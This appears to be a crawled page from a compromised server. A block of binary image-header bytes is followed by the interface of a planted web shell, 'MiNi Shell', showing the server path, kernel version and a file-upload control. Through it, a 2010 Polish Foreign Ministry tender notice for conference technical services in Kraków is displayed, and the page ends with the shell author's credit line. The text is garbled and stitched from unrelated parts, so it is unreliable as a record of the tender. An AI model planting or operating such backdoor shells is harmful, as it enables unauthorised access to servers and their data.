JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/143986-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie obsługi technicznej Konferencji Wysokiego Szczebla z okazji 10-lecia Obchodów Wspólnoty Demokracji w Krakowie.</b><br>
<b>Numer ogłoszenia: 143986 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie obsługi technicznej Konferencji Wysokiego Szczebla z okazji 10-lecia Obchodów Wspólnoty Demokracji w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie obsługi technicznej Konferencji Wysokiego Szczebla z okazji 10-lecia Obchodów Wspólnoty Demokracji w Krakowie. Konferencja zostanie zorganizowana w Operze Krakowskiej oraz w Teatrze im. Juliusza Słowackiego w Krakowie i będzie trwała od 2 - 4 lipca 2010 r. Montaż elementów technicznych musi się odbyć w dniach 1-2 lipca 2010r.(w Operze Krakowskiej), 2 lipca 2010 r. (w Teatrze Słowackiego),  demontaż w nocy z 3 na 4 lipca 2010 r. (w Teatrze Słowackiego), 4 lipca 2010 r. (w Operze Krakowskiej) 

1. Cele organizacyjne Konferencji:
- podniesienie wiedzy delegatów przybyłych na Konferencję o demokracji w Polsce;
- stworzenie przyjaznych warunków pracy;
- pokazanie Polski jako kraju nowoczesnego i demokratycznego;
- promocja Polski.

Konferencja skierowana jest do następujących grup docelowych: 
- Ministrów Spraw Zagranicznych;
- dyplomatów; 
- organizacji pozarządowych zajmujących się tematyką demokracji;
- mediów krajowych i zagranicznych (drukowanych, elektronicznych, on-line).
	
Wynikiem prac Wykonawcy będzie obsługa techniczna wszystkich wydarzeń wchodzących w skład Konferencji. 

Zamawiający dopuszcza zastosowanie materiałów, urządzeń i sprzętu równoważnego     (o parametrach równoważnych lub wyższych)  do przedstawionego i opisanego w niniejszej specyfikacji. Użyte znaki towarowe i nazwy są przykładowe. 


W przypadku materiałów, urządzeń i sprzętu równoważnego, muszą to być produkty dopuszczone do użytku na terenie Polski. 

2. Założenia konferencji:
Wykonawca w ramach realizacji zamówienia zobowiązany będzie do zapewnienia obsługi technicznej spotkań z uwzględnieniem wszystkich sal konferencyjnych, przestrzeni dla uczestników, mediów i organizatorów. Wykonawca zobowiązany będzie również do zapewnienia całości niezbędnego sprzętu technicznego wraz z obsługą. Ponadto do zadań Wykonawcy będzie należał montaż i demontaż sprzętu i materiałów.

3. SZCZEGÓŁOWY ZAKRES USŁUG:

3.1.	ELEMENTY TECHNICZNE - WYPOSAŻENIE SAL KONFERENCYJNYCH:

A. Opera Krakowska
- Piątek 2 lipca:

a) wyposażenie 4 sal konferencyjnych (ustawienie stołów w kwadrat) w:
- 25 multifonów z podłączeniem ich do systemu nagłośnieniowego w 2 salach, w 2 pozostałych wraz z systemem nagłośnieniowy;
- Ekran (170x230 lub zbliżony) ze statywem, projektor (min. 3500ANSI), laptop (WinXP, Open Office, Acrobat), plazma 42 cale do podglądu dla jednego z boków kwadratu;
b) rejestracja audio ze spotkań;
c) wyposażenie sali konferencyjnej (sala Prób) w ustawieniu teatralnym dla 100 osób (sala w niezmienionej formie będzie funkcjonować do niedzieli 4 lipca do godziny 15.00); 
- ekran (3x2m lub zbliżone) z projektorem (min. 5000ANSI), laptop (WinXP, Open Office, Acrobat) w Sali kameralnej;
System nagłośnieniowy zapewni Opera.
d) wyposażenie tzw. Press corner oraz dwóch activist corners (w dniach 2-4 lipca) w:
- mini system nagłośnieniowy z trzema mikrofonami bezprzewodowymi;
- okablowanie elektryczne (230V);
- oświetlenie fotograficzne.

Sobota 3 lipca:
a) Sala Kameralna i Sala Koncertowa ustawienie teatralne dla 200 osób:
- ekran (3x2m lub zbliżone) z projektorem jedynie w Sali Kameralnej (min. 5000ANSI), laptop (WinXP, Open Office, Acrobat) w Sali Prób;
- system tłumaczeń obsługujący 2 sale konferencyjne (salę główną i salę kameralną) po 4 budki z podglądem. 500 zestawów słuchawkowych;
System nagłośnieniowy na obu salach zapewnia Opera.
b) Sala prób, Press korner oraz activist corners jak w dniu 2 lipca:
- kompletny system telewizji przemysłowej umożliwiający transmisję online z dwóch sal (Sali głównej i kameralnej) wraz z systemem telewizji CCTV w budynku Opery - 6 ekranów - plazm minimum 42 cale. Cyfrowy zapis audiowizualny ze spotkań.

-Niedziela 4 lipca:
a) Sala kameralna, , ustawienie teatralne dla 100 osób:
- Ekran (3x2m lub zbliżone) z projektorem (min. 5000ANSI), laptop (WinXP, Open Office, Acrobat), plazma z podglądem.
b) Sala prób, Press korner oraz activist corners jak w dniu 2 lipca.

B. Teatr im. Juliusza Słowackiego:
- Sobota 3 lipca:
a)	nagłośnienie Sali Lustrzanej(cztery multifony, 4 mikrofony bezprzewodowe, tzw skrzynki dziennikarskie umożliwiające jednoczesne podłączenie się minimum 15 odbiorców do odbiorników dla każdego z 5 języków); 
b)	kompletny system telewizji przemysłowej umożliwiający transmisję online na stronę www. z możliwością odbioru przez minimum 800 widzów jednocześnie, w jednej wersji językowej z dwóch sal (Sali głównej i Sali lustrzanej - konferencje prasowe) wraz z systemem telewizji CCTV w budynku Teatru składającym się z 8 telewizorów plazmowych 42 cale;
c)	cyfrowy zapis audiowizualny ze spotkań;
d)	system tłumaczeń obsługujący 2 sale konferencyjne (salę główną i salę lustrzaną dla 4 języków z podglądem). 700 zestawów słuchawkowych;
e)	system nagłośnieniowy umożliwiający śledzenie wydarzeń na Sali głównej na drugim piętrze w centrum prasowym;
f)	mównica z teleprompterem w Sali lustrzanej oraz Sali głównej.

3.2. INNE ELEMETY TECHNICZNE:
a)	30 komputerów PC wyposażonych w angielskojęzyczne wersje systemu WinXP wraz z pakietem Open Office oraz programem Acrobat Reader wyposażone w zabezpieczenia antykradzieżowe;
b)	5 drukarek czarno-białych laserowych o wydajności min. 16 stron na minutę, druk dwustronny, wraz z materiałami eksploatacyjnymi umożliwiającymi wydruk do 1500 kopii każde;
c)	3 urządzenia wielofunkcyjne (ksero, drukarka, skaner) kolorowe o wydajności  min 20 stron na minutę, druk dwustronny wraz z materiałami eksploatacyjnymi umożliwiającymi wydruk do 5000 kopii każde;
d)	Każda z drukarek i urządzeń powinna zostać skonfigurowana do pracy z jednym komputerem klasy PC o których mowa wyżej;
e)	10 krótkofalówek wraz z ładowarkami i dwiema częstotliwościami do dyspozycji Zamawiającego;
f)	Hala namiotowa o wymiarach 5x10m z podłogą z wykładziną w kolorze zaakceptowanym przez Zamawiającego dniach 2-4 lipca wyposażona w podłączenie prądu (10KW), oświetlenie wnętrza, ladę recepcyjną o długości 5m, 4 stoły, 8 krzeseł (hala zostanie ustawiona na terenie parkingu naprzeciwko Opery Krakowskiej, na twardym podłożu, wymagającym poziomowania -różnica poziomów około 20 cm); 
g)	100 mb taśmy na słupkach grodzących;
h)	4 namioty (baldachimy szybkorozkładalne) o wymiarach 3x6 metra w kolorze białym wraz z systemem kotwienia do podłoża;
i)	8 stojaków na materiały o formacie A4;
j)	150 koziołków (stojaków z systemem mocowaniem do foteli w Teatrze Słowackiego) na nazwy państw i organizacji oraz nazwiska uczestników spotkania w formacie DL, 

lista państw, organizacji i nazwisk do druku zostanie przekazana wykonawcy na 7 dni przed rozpoczęciem spotkania; 
k)	40 przedłużaczy elektrycznych 230V, minimum 4 gniazda, długość 5m.

3.3. TYMCZASOWA ZABUDOWA POMIESZCZEŃ:
Wykonawca zobowiązany będzie do przygotowania 5 pomieszczeń o powierzchni 18m2 każde, na parterze Opery Krakowskiej z systemu Octanorm lub zbliżonego, wyposażone w drzwi zamykane na klucz, oświetlenie oraz 8 gniazd elektrycznych.

3.4.OBSŁUGA TECHNICZNA SPOTKAŃ TOWARZYSZĄCYCH OBCHODOM:

- Oświetlenie i nagłośnienie wejścia oraz dziedzińca Pałacu Biskupa Erazma Ciołka w dniu 3 lipca 2010 r.

3.5.	ZAPEWNIENIE OBSŁUGI OBCHODÓW:

- 4 osoby do obsługi sal konferencyjnych w dniach 2-4 lipca 2010 r. - szacowany czas pracy każdej osoby - 12h dziennie;
- 4 pracowników stanowiska informacyjnego w dniach 2-4 lipca 2010 r. - szacowany czas pracy każdej osoby 12h dziennie.
- Obsługa sprzętu technicznego zapewnionego przez Wykonawcę, w tym minimum jedna osoba sprawująca opiekę nad sprzętem komputerowym i drukarkami w każdej lokalizacji.

Każda z osób zatrudnionych do obsługi Obchodów musi posługiwać się płynnie językiem angielskim. 
Kompletna lista personelu technicznego obecnego na miejscu Obchodów w czasie ich trwania będzie musiała zostać przedłożona Zamawiającego najpóźniej w dniu podpisania umowy w celu jej weryfikacji przez stosowne służby. Zamawiający zastrzega sobie prawo do odmowy dopuszczenia danej osoby, w wyniku negatywnej weryfikacji,  do realizacji przedmiotu umowy. W takiej sytuacji, Wykonawca będzie zobowiązany do zastąpienia osoby, o której mowa powyżej, nową osobą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust 1 pkt. 6) Zamawiający przewiduje mozliwośc udzielenia zamówien uzupelniających stanowiących nie więcej niż 50% zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień co zamowienie podstawowe.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 51.31.00.00-8, 51.61.00.00-1, 51.11.00.00-6, 64.22.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 6 000,00 zł (słownie:  sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzowal tego warunku.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać  się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku  tj., w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonują, co najmniej dwie usługi polegające na wykonaniu kompleksowej organizacji spotkań krajowych lub międzynarodowych polegających na ich obsłudze technicznej, tj. m.in. zapewnieniu nagłośnienia, oświetlenia, w tym zapewnieniu niezbędnego sprzętu technicznego do organizacji tychże spotkań oraz jego obsłudze, o wartości co najmniej 100 000,00 zł brutto każda; 
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzowal tego warunku.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, tj.  co najmniej 8 osobami posługującymi się płynnie w mowie i piśmie językiem angielskim na poziomie co najmniej zaawansowanym;
Jeżeli Wykonawca będzie wykonywał zamówienie przy udziale większej liczby osób, wszystkie te osoby będą musiały posługiwać się płynnie w mowie i w piśmie językiem angielskim. na poziomie co najmniej zaawansowanym;
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzowal tego warunku.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.msz.gov.pl/ zakładka AKTUALNOŚCI/ ZAMOWIENIA PUBLICZNE ZARZĄD OBSŁUGI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 11:00, miejsce: Oferty należy składać w dni robocze (bez sobót i niedziel) w godz. 9.00 - 14.00 na Dzienniku Podawczym w siedzibie Zamawiającego przy Al. Szucha 23, 00-580 Warszawa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com